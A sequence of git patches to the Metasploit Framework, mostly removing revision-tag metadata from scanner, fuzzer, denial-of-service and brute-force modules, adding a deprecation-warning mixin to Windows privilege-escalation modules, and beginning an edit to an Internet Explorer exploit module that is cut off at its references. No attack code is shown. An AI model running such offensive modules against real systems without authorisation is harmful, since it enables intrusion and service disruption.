+++ b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb @@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( [ diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb index 20e675e0ea..c4111158a8 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb @@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( [ diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index 57b83d2446..62922bf205 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -19,8 +19,7 @@ class Metasploit3 < Msf::Auxiliary replaying during a web assessment. Finding unlinked and old pages. }, 'Author' => [ 'mubix' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( [ diff --git a/modules/auxiliary/scanner/ip/ipidseq.rb b/modules/auxiliary/scanner/ip/ipidseq.rb index 548762fa1d..03e5aa94f5 100644 --- a/modules/auxiliary/scanner/ip/ipidseq.rb +++ b/modules/auxiliary/scanner/ip/ipidseq.rb @@ -31,8 +31,7 @@ class Metasploit3 < Msf::Auxiliary classified as "Incremental" or "Broken little-endian incremental". }, 'Author' => 'kris katterjohn', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE ) register_options([ diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index c6b6d917d7..a39de92313 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -26,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'CVE', '1999-0502'] # Weak password - ], - 'Version' => '$Revision$' + ] )) end diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index f2ac9f8b28..3869c4c321 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -33,8 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://www.oracle.com/us/products/database/index.html' ], [ 'CVE', '1999-0502'], # Weak password CVE [ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html'] - ], - 'Version' => '$Revision$' + ] )) register_options( diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index 3cf861a493..2a23ef7a6e 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb @@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary SIDs read from the named file will be attempted in sequence instead. }, 'Author' => [ 'todb' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 755e08ccc0..d7cd2c5899 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -30,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.postgresql.org' ], [ 'CVE', '1999-0502'] # Weak password - ], - 'Version' => '$Revision$' + ] )) register_options( diff --git a/modules/auxiliary/vsploit/pii/email_pii.rb b/modules/auxiliary/vsploit/pii/email_pii.rb index 761f90185b..80773acd44 100644 --- a/modules/auxiliary/vsploit/pii/email_pii.rb +++ b/modules/auxiliary/vsploit/pii/email_pii.rb @@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary should be flagged via an internal or external SMTP server. }, 'License' => MSF_LICENSE, - 'Author' => ['willis'], - 'Version' => '$Revision$' + 'Author' => ['willis'] )) register_options( [ From e4a666992741cc261b8527a5efa06aaf9419943f Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 3 Jan 2013 01:05:45 +0100 Subject: [PATCH 135/154] msftidy: remove $Revision$ --- modules/auxiliary/dos/tcp/junos_tcp_opt.rb | 3 +-- modules/auxiliary/dos/tcp/synflood.rb | 3 +-- modules/auxiliary/gather/search_email_collector.rb | 3 +-- modules/auxiliary/scanner/http/backup_file.rb | 3 +-- modules/auxiliary/scanner/http/blind_sql_query.rb | 3 +-- modules/auxiliary/scanner/http/brute_dirs.rb | 3 +-- modules/auxiliary/scanner/http/copy_of_file.rb | 3 +-- modules/auxiliary/scanner/http/dir_listing.rb | 3 +-- modules/auxiliary/scanner/http/dir_scanner.rb | 3 +-- modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb | 3 +-- modules/auxiliary/scanner/http/error_sql_injection.rb | 3 +-- modules/auxiliary/scanner/http/file_same_name_dir.rb | 3 +-- modules/auxiliary/scanner/http/files_dir.rb | 3 +-- modules/auxiliary/scanner/http/lucky_punch.rb | 3 +-- modules/auxiliary/scanner/http/mod_negotiation_brute.rb | 3 +-- modules/auxiliary/scanner/http/mod_negotiation_scanner.rb | 3 +-- modules/auxiliary/scanner/http/prev_dir_same_name_file.rb | 3 +-- modules/auxiliary/scanner/http/replace_ext.rb | 3 +-- modules/auxiliary/scanner/http/soap_xml.rb | 3 +-- modules/auxiliary/scanner/http/verb_auth_bypass.rb | 3 +-- modules/auxiliary/scanner/http/vhost_scanner.rb | 3 +-- modules/auxiliary/scanner/http/web_vulndb.rb | 3 +-- modules/auxiliary/scanner/http/xpath.rb | 3 +-- modules/auxiliary/scanner/portscan/ack.rb | 1 - modules/auxiliary/scanner/portscan/syn.rb | 1 - modules/auxiliary/scanner/portscan/xmas.rb | 1 - modules/auxiliary/scanner/postgres/postgres_version.rb | 3 +-- 27 files changed, 24 insertions(+), 51 deletions(-) diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index e323a3e57b..8d7291337c 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -30,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary ['BID', '37670'], ['OSVDB', '61538'], ['URL','http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/'] - ], - 'Version' => '$Revision$' # 02/02/2010 + ] ) register_options([ diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index 1338ed66d9..66b5a47282 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -17,8 +17,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'TCP SYN Flooder', 'Description' => 'A simple TCP SYN flooder', 'Author' => 'kris katterjohn', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' # 03/13/2009 + 'License' => MSF_LICENSE ) register_options([ diff --git a/modules/auxiliary/gather/search_email_collector.rb b/modules/auxiliary/gather/search_email_collector.rb index 003c3c81d7..30a7082f26 100644 --- a/modules/auxiliary/gather/search_email_collector.rb +++ b/modules/auxiliary/gather/search_email_collector.rb @@ -19,8 +19,7 @@ class Metasploit3 < Msf::Auxiliary valid email addresses for the target domain. }, 'Author' => [ 'Carlos Perez ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'License' => MSF_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index ae3b6defbb..2aec802d2b 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary of a specific file in a given path. }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index e0803a2b84..10ff301f72 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -27,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary in GET/POST Query parameters values. }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/brute_dirs.rb b/modules/auxiliary/scanner/http/brute_dirs.rb index 1ee4cda7f5..df22ba26e7 100644 --- a/modules/auxiliary/scanner/http/brute_dirs.rb +++ b/modules/auxiliary/scanner/http/brute_dirs.rb @@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index de38cf06ba..0e50dc2e32 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary of a specific file in a given path. }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index a29e79687f..934dbc3083 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary in a given directory path. }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/dir_scanner.rb b/modules/auxiliary/scanner/http/dir_scanner.rb index 01bb02af12..0127ab6f0e 100644 --- a/modules/auxiliary/scanner/http/dir_scanner.rb +++ b/modules/auxiliary/scanner/http/dir_scanner.rb @@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary in a given directory path. }, 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index eb290dc808..6f7609e06c 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -36,8 +36,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2009-1122' ], [ 'OSVDB', '54555' ], [ 'BID', '34993' ], - ], - 'Version' => '$Revision$')) + ])) register_options( [ diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index 8620a31e1c..33c889dcc8 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index a3518af954..7b7b818d21 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -27,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary Only works if PATH is differenet than '/'. }, 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index a2c8d8d0a4..dbed24a165 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary in a given directory path. }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 8178c7c237..a210e13120 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -26,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary XSS attack to redirect user browser to a attacker controller website. }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb index 730d26a35c..a44007273a 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb @@ -26,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary files found will be displayed. }, 'Author' => [ 'diablohorn [at] gmail.com' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'License' => MSF_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb index bf54abe547..9d55942f1c 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb @@ -20,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary If the webserver has mod_negotiation enabled, the IP address will be displayed. }, 'Author' => [ 'diablohorn [at] gmail.com' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'License' => MSF_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index afdc2eed78..ace0a05755 100644 --- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary following files /backup/files.ext . }, 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index 619025e552..18f166f7f9 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -27,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index 95a887a24d..7f1f3a9be5 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary hidden methods. }, 'Author' => [ 'patrick' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'License' => MSF_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index f9452ab654..e2de4014d0 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -27,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/vhost_scanner.rb b/modules/auxiliary/scanner/http/vhost_scanner.rb index f41b7af14d..76e0617f69 100644 --- a/modules/auxiliary/scanner/http/vhost_scanner.rb +++ b/modules/auxiliary/scanner/http/vhost_scanner.rb @@ -32,8 +32,7 @@ require 'cgi' }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 3cf57529c9..7682ea0268 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary This module identifies common vulnerable files or cgis. }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index ade6887976..a5f23da17e 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary This module exploits blind XPATH 1.0 injections over HTTP GET requests. }, 'Author' => [ 'et [at] metasploit . com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index 45122d25bc..ff8c9578c0 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary not in place for them. }, 'Author' => 'kris katterjohn', - 'Version' => '$Revision$', # 03/26/2009 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index b0698220e1..8518543da5 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary Enumerate open TCP services using a raw SYN scan. }, 'Author' => 'kris katterjohn', - 'Version' => '$Revision$', # 03/26/2009 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index 377615fa46..3335c64240 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary PSH and URG flags. }, 'Author' => 'kris katterjohn', - 'Version' => '$Revision$', # 04/08/2009 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index b2a1eb328f..c18f3c01a5 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -26,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://www.postgresql.org' ] - ], - 'Version' => '$Revision$' # 2009-02-05 + ] )) register_options([ ], self.class) # None needed. From d9947a1515406f8a7fccc27f9719a937857461b0 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 2 Jan 2013 19:14:44 -0600 Subject: [PATCH 136/154] Add a mixin for marking deprecated modules * This mixin standardizes the previously ad-hoc deprecation warnings on modules that have been moved. * Uses the mixin in 3 existing modules that already have (or should have had) deprecation warnings. --- lib/msf/core/module/deprecated.rb | 58 +++++++++++++++++++ modules/post/windows/escalate/bypassuac.rb | 15 ++--- .../windows/escalate/ms10_092_schelevator.rb | 6 ++ .../windows/escalate/service_permissions.rb | 16 ++--- 4 files changed, 72 insertions(+), 23 deletions(-) create mode 100644 lib/msf/core/module/deprecated.rb diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb new file mode 100644 index 0000000000..e43d41a991 --- /dev/null +++ b/lib/msf/core/module/deprecated.rb @@ -0,0 +1,58 @@ + +module Msf::Module::Deprecated + + # Additional class methods for deprecated modules + module ClassMethods + # Mark this module as deprecated + # + # Any time this module is run it will print warnings to that effect. + # + # @param deprecation_date [Date,#to_s] The date on which this module will + # be removed + # @param replacement_module [String] The name of a module that users + # should be using instead of this deprecated one + # @return [void] + def deprecated(deprecation_date=nil, replacement_module=nil) + # Yes, class instance variables. + @replacement_module = replacement_module + @deprecation_date = deprecation_date + end + + # The name of a module that users should be using instead of this + # deprecated one + # + # @return [String,nil] + # @see ClassMethods#deprecated + def replacement_module; @replacement_module; end + + # The date on which this module will be removed + # + # @return [Date,nil] + # @see ClassMethods#deprecated + def deprecation_date; @deprecation_date; end + end + + # (see ClassMethods#replacement_module) + def replacement_module; self.class.replacement_module; end + # (see ClassMethods#deprecation_date) + def deprecation_date; self.class.deprecation_date; end + + # Extends with {ClassMethods} + def self.included(base) + base.extend(ClassMethods) + end + + def setup + print_warning("*"*72) + print_warning("*%red"+"This module is deprecated!".center(70)+"%clr*") + if deprecation_date + print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*") + end + if replacement_module + print_warning("*"+"Use #{replacement_module} instead".center(70)+"*") + end + print_warning("*"*72) + super + end + +end diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 209f7c4d78..921a1cfa61 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -14,6 +10,10 @@ require 'rex' class Metasploit3 < Msf::Post + require 'msf/core/module/deprecated' + include Msf::Module::Deprecated + deprecated Date.new(2013,1,4), "exploit/windows/local/bypassuac" + def initialize(info={}) super( update_info( info, 'Name' => 'Windows Escalate UAC Protection Bypass', @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'David Kennedy "ReL1K" ', 'mitnick' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => [ @@ -41,12 +40,6 @@ class Metasploit3 < Msf::Post end def run - print_error("***********************************************") - print_error("* *") - print_error("* Module will be depricated on Jan 4 2013 *") - print_error("* Please use exploits/windows/local/bypassuac *") - print_error("* *") - print_error("***********************************************") vuln = false sysinfo = session.sys.config.sysinfo winver = sysinfo["OS"] diff --git a/modules/post/windows/escalate/ms10_092_schelevator.rb b/modules/post/windows/escalate/ms10_092_schelevator.rb index 535c0827b9..1a0cc5397b 100644 --- a/modules/post/windows/escalate/ms10_092_schelevator.rb +++ b/modules/post/windows/escalate/ms10_092_schelevator.rb @@ -12,6 +12,12 @@ require 'zlib' class Metasploit3 < Msf::Post + + #require 'msf/core/module/deprecated' + load 'lib/msf/core/module/deprecated.rb' + include Msf::Module::Deprecated + deprecated Date.new(2013,6,1), "exploit/windows/local/ms10_092_schelevator" + include Msf::Post::Common def initialize(info={}) diff --git a/modules/post/windows/escalate/service_permissions.rb b/modules/post/windows/escalate/service_permissions.rb index 77780e2921..2d217ce4d9 100644 --- a/modules/post/windows/escalate/service_permissions.rb +++ b/modules/post/windows/escalate/service_permissions.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -12,10 +8,13 @@ require 'msf/core' require 'msf/core/post/windows/services' require 'rex' -require 'msf/core//post/windows/services' class Metasploit3 < Msf::Post + require 'msf/core/module/deprecated' + include Msf::Module::Deprecated + deprecated Date.new(2013,1,10), "exploit/windows/local/service_permissions" + include ::Msf::Post::Windows::Services def initialize(info={}) super( update_info( info, @@ -32,7 +31,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'scriptjunkie' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) @@ -47,12 +45,6 @@ class Metasploit3 < Msf::Post end def run - print_error("*********************************************************") - print_error("* *") - print_error("* Module will be depricated on Jan 10 2013 *") - print_error("* Please use exploits/windows/local/service_permissions *") - print_error("* *") - print_error("*********************************************************") print_status("running") lhost = datastore["LHOST"] || Rex::Socket.source_address From 8cada447b2381de8780c2beaa75892c8a5ad4b82 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 3 Jan 2013 10:21:10 +0100 Subject: [PATCH 137/154] msftidy: remove $Id$ --- modules/auxiliary/bnat/bnat_router.rb | 4 ---- modules/auxiliary/bnat/bnat_scan.rb | 4 ---- modules/auxiliary/crawler/msfcrawler.rb | 2 -- modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb | 4 ---- 4 files changed, 14 deletions(-) diff --git a/modules/auxiliary/bnat/bnat_router.rb b/modules/auxiliary/bnat/bnat_router.rb index c1ced41d73..5c18619acf 100644 --- a/modules/auxiliary/bnat/bnat_router.rb +++ b/modules/auxiliary/bnat/bnat_router.rb @@ -1,7 +1,3 @@ -### -# $Id$ -### - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 75ab0fb609..b659524639 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -1,7 +1,3 @@ -### -# $Id$ -### - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 5cd0c7a239..5d9af9fc57 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -1,7 +1,5 @@ #!/usr/bin/env ruby # -# $Id$ -# # Web Crawler. # # Author: Efrain Torres et [at] metasploit.com 2010 diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index 0822d0655f..3e66dc05e0 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -8,7 +5,6 @@ # http://metasploit.com/ ## - require 'msf/core' class Metasploit3 < Msf::Auxiliary From 1406f7cb0a231566fda45278d8ad4c2518294fff Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 3 Jan 2013 10:55:11 -0600 Subject: [PATCH 138/154] Msftidy on sap_router_info_request --- modules/auxiliary/scanner/sap/sap_router_info_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb index 5adf1fcfba..af2c9c6500 100644 --- a/modules/auxiliary/scanner/sap/sap_router_info_request.rb +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -30,7 +30,7 @@ class Metasploit4 < Msf::Auxiliary 'Chris John Riley', # Testing 'Ian de Villiers', # Testing 'Joris van de Vis' # Testing - ], + ], 'License' => BSD_LICENSE ) register_options( From 06b937ec11610ac415281355eec8a2567d7f3a61 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 3 Jan 2013 11:57:47 -0600 Subject: [PATCH 139/154] Implements WTFUzz's no-spray technique Do not try to bend the spoon, that is impossible. Instead, only try to realize the truth: there is no spoon. --- .../windows/browser/ie_cbutton_uaf.rb | 253 ++++++++++++------ 1 file changed, 178 insertions(+), 75 deletions(-) diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index fa29e78184..1b475a0e5b 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -30,8 +30,9 @@ class Metasploit3 < Msf::Exploit::Remote [ 'eromang', 'mahmud ab rahman', - 'juan vazquez', - 'sinn3r' #Metasploit + 'juan vazquez', #Metasploit + 'sinn3r', #Metasploit + 'Peter Vreugdenhil' #New trigger & new exploit technique ], 'References' => [ @@ -42,13 +43,15 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], - [ 'URL', 